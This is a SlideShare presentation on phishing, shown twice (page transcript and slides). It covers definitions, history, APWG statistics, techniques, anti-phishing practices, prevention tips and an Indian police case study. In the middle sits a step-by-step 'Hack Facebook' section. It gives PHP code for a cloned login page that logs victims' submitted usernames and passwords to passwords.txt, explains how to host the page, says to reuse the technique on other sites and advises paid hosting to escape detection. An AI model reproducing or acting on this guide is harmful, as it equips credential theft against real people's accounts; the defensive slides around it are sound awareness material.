SlideShare une entreprise Scribd logo

Phishing

Télécharger en tant que PPTX, PDF
Ajit Yadav
Ajit Yadav

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. Phishing is a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.

Formation
1  sur  42
PHISHING
Agenda 1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF PHISHING 2:- HISTORY AND CURRENT STATUS OF PHISHING 3:- PHISHING TECHNIQUES 4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP! 5:- DAMAGED CAUSED BY PHISHING AND ANTIPHISHING 6:-How To Combat Phishing What to do ? And What not to do? 7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND CASE STUDY
DEFINITION AND DESCRIPTION • Phishing is an act of attempt to acquire information such as usernames,passwords, and credit card details,etc of a person or organization illegaly in an electronic communication. • Phishing is committed so that the Phisher may obtain sensitive and valuable information about a consumer, usually with the goal of fraud to obtain the customer bank and other financial information. • Phishing are typically carried out by e-mail spoofing or instant messaging.
• In phishing the criminals creates a fake website whose looks and feel are identical to the legitimate one, in which the victims are told to enter their confidential details like username, password or account details. • Phishing technique was described in detail in the year 1987 and this technique was first used in the year 1995 • Phishing is mainly commited ,so that the criminal may obtain sensitive & valuable information about the customer. • Phishing makes high profit with less or small technological investment
History  Phreaking + Fishing = Phishing - Phreaking = making phone calls for free back in 70’s • - Fishing = Use bait to lure the target  Phishing in 1995 Target: AOL users Purpose: getting account passwords for free time Threat level: low Techniques: Similar names ( www.ao1.com for www.aol.com ), social engineering  Phishing in 2001 Target: Ebayers and major banks Purpose: getting credit card numbers, accounts Threat level: medium Techniques: Same in 1995, keylogger  Phishing in 2007 Target: Paypal, banks, ebay Purpose: bank accounts Threat level: high Techniques: browser vulnerabilities, link obfuscation
Current status of Phishing • • The APWG received 26,150 unique phishing reports. • This total represents the second highest number of phishing reports that the APWG has received in a single month. • • The APWG detected 10,091 unique phishing websites worldwide. • • 148 separate corporate brands were “hijacked” (misused) in phishing schemes (compared to 84 in August 2005v). • • The financial sector was the most heavily targeted for phishing schemes, constituting 92.6 percent of all phishing attacks
• • The APWG found 2,303 unique websites that hosted “keylogging.” programs. • • The United States was the country hosting the largest percentage of phishing websites (27.7 percent, compared to 27.9 percent in August 2005), while Canada ranked ninth among countries hosting such websites (2.2 percent, compared to 2.21 percent in August 2005). China remains the second most frequent host of phishing websites (14 percent, compared to 12.15 percent in August 2005), and South Korea the third most frequent host of such sites (9.59 percent, compared to 9.6 percent in August 2005).
• A very recent and popular case of phishing is that the chinese phishers are targeting GMAIL account of high ranked official of united states,south korea government and military information & chinese political activities.
Phishing Technique  Deceptive - Sending a deceptive email, in bulk, with a “call to action” that demands the recipient click on a link.  Malware-Based - Running malicious software on the user’s machine. Various forms of malware-based phishing are:  Key Loggers & Screen Loggers  Session Hijackers  Web Trojans  Data Theft  DNS-Based - Phishing that interferes with the integrity of the lookup process for a domain name. Forms of DNS-based phishing are:  Hosts file poisoning  Polluting user’s DNS cache  Proxy server compromise
 Content-Injection – Inserting malicious content into legitimate site. Three primary types of content-injection phishing:  Hackers can compromise a server through a security vulnerability and replace or augment the legitimate content with malicious content.  Malicious content can be inserted into a site through a cross-site scripting vulnerability. Malicious actions can be performed on a site through a SQL injection vulnerability.
• Man-in-the-Middle Phishing - Phisher positions himself between the user and the legitimate site. • Search Engine Phishing - Create web pages for fake products, get the pages indexed by search engines, and wait for users to enter their confidential information as part of an order, sign-up, or balance transfer.
Step To Hack Facebook • Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.
• Step 2: Find for something which looks like this :
Step 3: Then change the action URL to login.php, now it will look similar to this. Save it as index.html.
• Step 4: Open a notepad and paste the following code inside it and save as login.php. <?php header (‘Location: http://www.facebook.com&#8217;); $handle = fopen(“passwords.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?> Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.
• Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt. Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim. • Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.
• Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.
• Step 8: Then click on File Manager
• Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.
• Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below. • Once you get your files uploaded you can check your page at your registered domain.
• The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password! • Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also. • Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.
DAMAGE CAUSE BY PHISHING • The Impact of phishing are both domestic and international, that are concern with the commercial and financial sectors. • Direct Financial Loss. Phishing technique is mainly done to make financial loss to a person or an organization. In this and consumers and businesses may lose from a few hundred dollars to millions of dollars. • • Erosion of Public Trust in the Internet. Phishing also decreases the public’s trust in the Internet.
• A survey found that 9 out of 10 American adult Internet users have made changes to their Internet habits because of the threat of identity theft. • The 30 percent say that they reduced their overall usage. • The 25 percent say they have stopped shopping online, while 29 percent of those that still shop online say they have decreased the frequency of their purchases.
Anti-Phishing  Anti-Phishing Working Group (APWG) The APWG has over 2300+ members from over 1500 companies & agencies worldwide. Member companies include leading security companies such as Symantec, McAfee and VeriSign. Financial Industry members include the ING Group,VISA, Mastercard and the American Bankers Association.
Educate application users  Think before you open  Never click on the links in an email , message boards or mailing lists  Never submit credentials on forms embedded in emails  Inspect the address bar and SSL certificate  Never open suspicious emails  Ensure that the web browser has the latest security patch applied  Install latest anti-virus packages  Destroy any hard copy of sensitive information  Verify the accounts and transactions regularly  Report the scam via phone or email.
 Formulate and enforce Best practices  Authorization controls and access privileges for systems, databases and applications.  Access to any information should be based on need-to- know principle  Segregation of duties.  Media should be disposed only after erasing sensitive information. Reinforce application development / maintenance processes: 1. Web page personalization  Using two pages to authenticate the users.  Using Client-side persistent cookies. 2. Content Validation  Never inherently trust the submitted data  Never present the submitted data back to an application user without sanitizing the same  Always sanitize data before processing or storing  Check the HTTP referrer header
3. Session Handling  Make session identifiers long, complicated and difficult to guess.  Set expiry time limits for the SessionID’s and should be checked for every client request.  Application should be capable of revoking active SessionID’s and not recycle the same SessionID.  Any attempt the invalid SessionID should be redirected to the login page.  Never accept session information within a URL.  Protect the session via SSL.  Session data should be submitted as a POST.  After authenticating, a new SessionID should be used (HTTP & HTTPS).  Never let the users choose the SessionID. 4. Image Regulation  Image Cycling  Session-bound images
5. URL Qualification  Do not reference redirection URL in the browser’s URL  Always maintain a valid approved list of redirection url’s  Never allow customers to supply their own URL’s  Never allow IP addresses to be user in URL information 6. Authentication Process  Ensure that a 2-phase login process is in place  Personalize the content  Design a strong token-based authentication 7. Transaction non-repudiation  To ensure authenticity and integrity of the transaction
PREVENTION TO BE TAKEN TO AVOID PHISHING • 1. Prevention: What to Do • Protect your computer with anti-virus software, spyware filters, e-mail filters, and firewall programs, and make sure that they are regularly updated. • Ensure that your Internet browser is up to date and security patches applied. • Avoid responding to any unknown email or giving your financial information to that mail.
• Unless the e-mail is digitally signed, it should also be fake. • Phishers typically ask for information such as usernames, passwords, credit card numbers, social security numbers, etc. • Phisher e-mails are typically not personalized, while valid messages from your bank or e-commerce company are generally personalized. • • Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
• To make sure you're on a secure Web server, check the beginning of the Web address in your browsers address bar - it should be "https://" rather than just "http://." • Regularly log into your online accounts. Don't leave them for a long period of time. • Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate. • If anything is suspicious, contact your bank and all card issuers.
2. Prevention: What Not to Do • Don't assume that you can correctly identify a website as legitimate by just looking at it. • Don’t use the links in an e-mail to get to any web page, if you think that the message might not be authentic. log onto the website directly by typing in the Web address in your browser. • Avoid filling out forms in e-mail messages that ask for personal financial information.
• You should only communicate information such as credit card numbers or account information via a secure website or the telephone.
What does all the above imply? It is better to be safer now than feel sorry later.
Case study Case - fraud done by Mumbai mafia in IT city City- Bangalore State- karnatka Background • • The cyber crime police of Bangalore, after a two year investigation have proved that the Mumbai mafia is phishing the it city • In this they have arrested three persons in connection in with 3 different incident. • • A cid official of SP’s rank said that this is a dangerous trend.
 The cyber crime police station (CCPS) registered around 100 such phishing cases in 2009,but it’s difficult for them to trace every case as they use benami bank account to do all this.  In this the cyber crime police had arrested 3 person ,all from Mumbai who are connected with this case. • The police said that all the arrested person are graduate and have a good knowledge in computer
Investigation • The cyber crime police had arrested one abdul khan from Mumbai. • The arrested person had transferred rs 1 lakh (rs 50000 in twice) from the icici account of one it professional abhishek malvia anative of itarsi , Madhya Pradesh.
Conclusion • Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institutions, and commercial enterprises in Canada, the United States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement, other government agencies, and the private sector in both countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.
Thank You!

Recommandé

The Phishing Ecosystem
The Phishing EcosystemThe Phishing Ecosystem
The Phishing Ecosystem
amiable_indian
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORT
vineetkathan
 
Seminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII SemSeminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII Sem
Narendra Singh
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
elakkiya poongunran
 
Phishing
PhishingPhishing
Phishing
oitaoming
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
Avishek Datta
 
Phishing
PhishingPhishing
Phishing
Syeda Javeria
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
Preeti Papneja
 

Recommandé

The Phishing Ecosystem
The Phishing EcosystemThe Phishing Ecosystem
The Phishing Ecosystem
amiable_indian
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORT
vineetkathan
 
Seminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII SemSeminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII Sem
Narendra Singh
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
elakkiya poongunran
 
Phishing
PhishingPhishing
Phishing
oitaoming
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
Avishek Datta
 
Phishing
PhishingPhishing
Phishing
Syeda Javeria
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
Preeti Papneja
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
harpinderkaur123
 
Introduction to phishing
Introduction to phishingIntroduction to phishing
Introduction to phishing
Raviteja Chowdary Adusumalli
 
Phishing and hacking
Phishing and hackingPhishing and hacking
Phishing and hacking
Md. Mehadi Hassan Bappy
 
Phishing
PhishingPhishing
Phishing
Jayaseelan Vejayon
 
Phishing
PhishingPhishing
Phishing
North Carolina State University
 
What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?
Quick Heal Technologies Ltd.
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
Sanjay Kumar
 
Phishing - A modern web attack
Phishing - A modern web attackPhishing - A modern web attack
Phishing - A modern web attack
Karthik
 
Anatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackAnatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing Attack
Mark Mair
 
What is a phishing attack
What is a phishing attackWhat is a phishing attack
What is a phishing attack
AariyaRathi
 
Email phishing and countermeasures
Email phishing and countermeasuresEmail phishing and countermeasures
Email phishing and countermeasures
Jorge Sebastiao
 
Identity theft 10 mar15
Identity theft 10 mar15Identity theft 10 mar15
Identity theft 10 mar15
Naval OPSEC
 
Phishing attack seminar presentation
Phishing attack seminar presentation Phishing attack seminar presentation
Phishing attack seminar presentation
AniketPandit18
 
Anonymous email 26 aug14
Anonymous email 26 aug14Anonymous email 26 aug14
Anonymous email 26 aug14
Naval OPSEC
 
Compilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacksCompilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacks
ArrayShield Technologies Private Limited
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
PhishLabs
 
e-Fraud ppt
e-Fraud ppte-Fraud ppt
e-Fraud ppt
jasonsirmon
 
Scams and-fraud-presentation
Scams and-fraud-presentationScams and-fraud-presentation
Scams and-fraud-presentation
Roel Palmaers
 
Cyber Crime Identity Theft
Cyber Crime Identity Theft Cyber Crime Identity Theft
Cyber Crime Identity Theft
Rahmat Inggi
 
Identity Theft ppt
Identity Theft pptIdentity Theft ppt
Identity Theft ppt
Angela Lawson
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
Sachin Saini
 
Cybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptxCybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptx
AbdullaFatiya3
 

Contenu connexe

Tendances

2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
PhishLabs
 

Tendances (20)

Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Introduction to phishing
Introduction to phishingIntroduction to phishing
Introduction to phishing
 
Phishing and hacking
Phishing and hackingPhishing and hacking
Phishing and hacking
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Phishing - A modern web attack
Phishing - A modern web attackPhishing - A modern web attack
Phishing - A modern web attack
 
Anatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackAnatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing Attack
 
What is a phishing attack
What is a phishing attackWhat is a phishing attack
What is a phishing attack
 
Email phishing and countermeasures
Email phishing and countermeasuresEmail phishing and countermeasures
Email phishing and countermeasures
 
Identity theft 10 mar15
Identity theft 10 mar15Identity theft 10 mar15
Identity theft 10 mar15
 
Phishing attack seminar presentation
Phishing attack seminar presentation Phishing attack seminar presentation
Phishing attack seminar presentation
 
Anonymous email 26 aug14
Anonymous email 26 aug14Anonymous email 26 aug14
Anonymous email 26 aug14
 
Compilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacksCompilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacks
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
 
e-Fraud ppt
e-Fraud ppte-Fraud ppt
e-Fraud ppt
 
Scams and-fraud-presentation
Scams and-fraud-presentationScams and-fraud-presentation
Scams and-fraud-presentation
 
Cyber Crime Identity Theft
Cyber Crime Identity Theft Cyber Crime Identity Theft
Cyber Crime Identity Theft
 
Identity Theft ppt
Identity Theft pptIdentity Theft ppt
Identity Theft ppt
 

Similaire à Phishing

Cybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter StyleCybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter Style
Brian Pichman
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
arri2009av
 
IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing Sites
IRJET Journal
 

Similaire à Phishing (20)

Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
 
Cybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptxCybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptx
 
Panama-Paper-Leak
Panama-Paper-LeakPanama-Paper-Leak
Panama-Paper-Leak
 
Panama Papers Leak and Precautions Law firms should take
Panama Papers Leak and Precautions Law firms should takePanama Papers Leak and Precautions Law firms should take
Panama Papers Leak and Precautions Law firms should take
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
Phishing
PhishingPhishing
Phishing
 
Anti phishing
Anti phishingAnti phishing
Anti phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
CyberSecurity - Computers In Libraries 2024
CyberSecurity - Computers In Libraries 2024CyberSecurity - Computers In Libraries 2024
CyberSecurity - Computers In Libraries 2024
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
 
Cybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter StyleCybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter Style
 
Phishing Attack : A big Threat
Phishing Attack : A big ThreatPhishing Attack : A big Threat
Phishing Attack : A big Threat
 
Protecting Your Business From Cybercrime
Protecting Your Business From CybercrimeProtecting Your Business From Cybercrime
Protecting Your Business From Cybercrime
 
Protecting Your Business from Cybercrime - Cybersecurity 101
Protecting Your Business from Cybercrime - Cybersecurity 101Protecting Your Business from Cybercrime - Cybersecurity 101
Protecting Your Business from Cybercrime - Cybersecurity 101
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Cyber security-1.pptx
Cyber security-1.pptxCyber security-1.pptx
Cyber security-1.pptx
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
 
Phishing Technology
Phishing TechnologyPhishing Technology
Phishing Technology
 
IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing Sites
 

Plus de Ajit Yadav

Plus de Ajit Yadav (6)

Cloud Computing Documentation Report
Cloud Computing Documentation ReportCloud Computing Documentation Report
Cloud Computing Documentation Report
 
Remote Admittance
Remote AdmittanceRemote Admittance
Remote Admittance
 
Frame Relay
Frame RelayFrame Relay
Frame Relay
 
INTRODUCTION TO JAVA APPLICATION
INTRODUCTION TO JAVA APPLICATIONINTRODUCTION TO JAVA APPLICATION
INTRODUCTION TO JAVA APPLICATION
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Cloud computing
Cloud computingCloud computing
Cloud computing
 

Dernier

Dernier (20)

UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structure
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptx
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
REMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptxREMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptx
 
Wellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptxWellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptx
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptx
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Spatium Project Simulation student brief
Spatium Project Simulation student briefSpatium Project Simulation student brief
Spatium Project Simulation student brief
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 

Phishing

  • 2. Agenda 1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF PHISHING 2:- HISTORY AND CURRENT STATUS OF PHISHING 3:- PHISHING TECHNIQUES 4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP! 5:- DAMAGED CAUSED BY PHISHING AND ANTIPHISHING 6:-How To Combat Phishing What to do ? And What not to do? 7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND CASE STUDY
  • 3. DEFINITION AND DESCRIPTION • Phishing is an act of attempt to acquire information such as usernames,passwords, and credit card details,etc of a person or organization illegaly in an electronic communication. • Phishing is committed so that the Phisher may obtain sensitive and valuable information about a consumer, usually with the goal of fraud to obtain the customer bank and other financial information. • Phishing are typically carried out by e-mail spoofing or instant messaging.
  • 4.
  • 5. • In phishing the criminals creates a fake website whose looks and feel are identical to the legitimate one, in which the victims are told to enter their confidential details like username, password or account details. • Phishing technique was described in detail in the year 1987 and this technique was first used in the year 1995 • Phishing is mainly commited ,so that the criminal may obtain sensitive & valuable information about the customer. • Phishing makes high profit with less or small technological investment
  • 6. History  Phreaking + Fishing = Phishing - Phreaking = making phone calls for free back in 70’s • - Fishing = Use bait to lure the target  Phishing in 1995 Target: AOL users Purpose: getting account passwords for free time Threat level: low Techniques: Similar names ( www.ao1.com for www.aol.com ), social engineering  Phishing in 2001 Target: Ebayers and major banks Purpose: getting credit card numbers, accounts Threat level: medium Techniques: Same in 1995, keylogger  Phishing in 2007 Target: Paypal, banks, ebay Purpose: bank accounts Threat level: high Techniques: browser vulnerabilities, link obfuscation
  • 7. Current status of Phishing • • The APWG received 26,150 unique phishing reports. • This total represents the second highest number of phishing reports that the APWG has received in a single month. • • The APWG detected 10,091 unique phishing websites worldwide. • • 148 separate corporate brands were “hijacked” (misused) in phishing schemes (compared to 84 in August 2005v). • • The financial sector was the most heavily targeted for phishing schemes, constituting 92.6 percent of all phishing attacks
  • 8. • • The APWG found 2,303 unique websites that hosted “keylogging.” programs. • • The United States was the country hosting the largest percentage of phishing websites (27.7 percent, compared to 27.9 percent in August 2005), while Canada ranked ninth among countries hosting such websites (2.2 percent, compared to 2.21 percent in August 2005). China remains the second most frequent host of phishing websites (14 percent, compared to 12.15 percent in August 2005), and South Korea the third most frequent host of such sites (9.59 percent, compared to 9.6 percent in August 2005).
  • 9. • A very recent and popular case of phishing is that the chinese phishers are targeting GMAIL account of high ranked official of united states,south korea government and military information & chinese political activities.
  • 10. Phishing Technique  Deceptive - Sending a deceptive email, in bulk, with a “call to action” that demands the recipient click on a link.  Malware-Based - Running malicious software on the user’s machine. Various forms of malware-based phishing are:  Key Loggers & Screen Loggers  Session Hijackers  Web Trojans  Data Theft  DNS-Based - Phishing that interferes with the integrity of the lookup process for a domain name. Forms of DNS-based phishing are:  Hosts file poisoning  Polluting user’s DNS cache  Proxy server compromise
  • 11.  Content-Injection – Inserting malicious content into legitimate site. Three primary types of content-injection phishing:  Hackers can compromise a server through a security vulnerability and replace or augment the legitimate content with malicious content.  Malicious content can be inserted into a site through a cross-site scripting vulnerability. Malicious actions can be performed on a site through a SQL injection vulnerability.
  • 12. • Man-in-the-Middle Phishing - Phisher positions himself between the user and the legitimate site. • Search Engine Phishing - Create web pages for fake products, get the pages indexed by search engines, and wait for users to enter their confidential information as part of an order, sign-up, or balance transfer.
  • 13. Step To Hack Facebook • Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.
  • 14. • Step 2: Find for something which looks like this :
  • 15. Step 3: Then change the action URL to login.php, now it will look similar to this. Save it as index.html.
  • 16. • Step 4: Open a notepad and paste the following code inside it and save as login.php. <?php header (‘Location: http://www.facebook.com&#8217;); $handle = fopen(“passwords.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?> Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.
  • 17. • Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt. Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim. • Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.
  • 18. • Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.
  • 19. • Step 8: Then click on File Manager
  • 20. • Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.
  • 21. • Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below. • Once you get your files uploaded you can check your page at your registered domain.
  • 22. • The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password! • Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also. • Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.
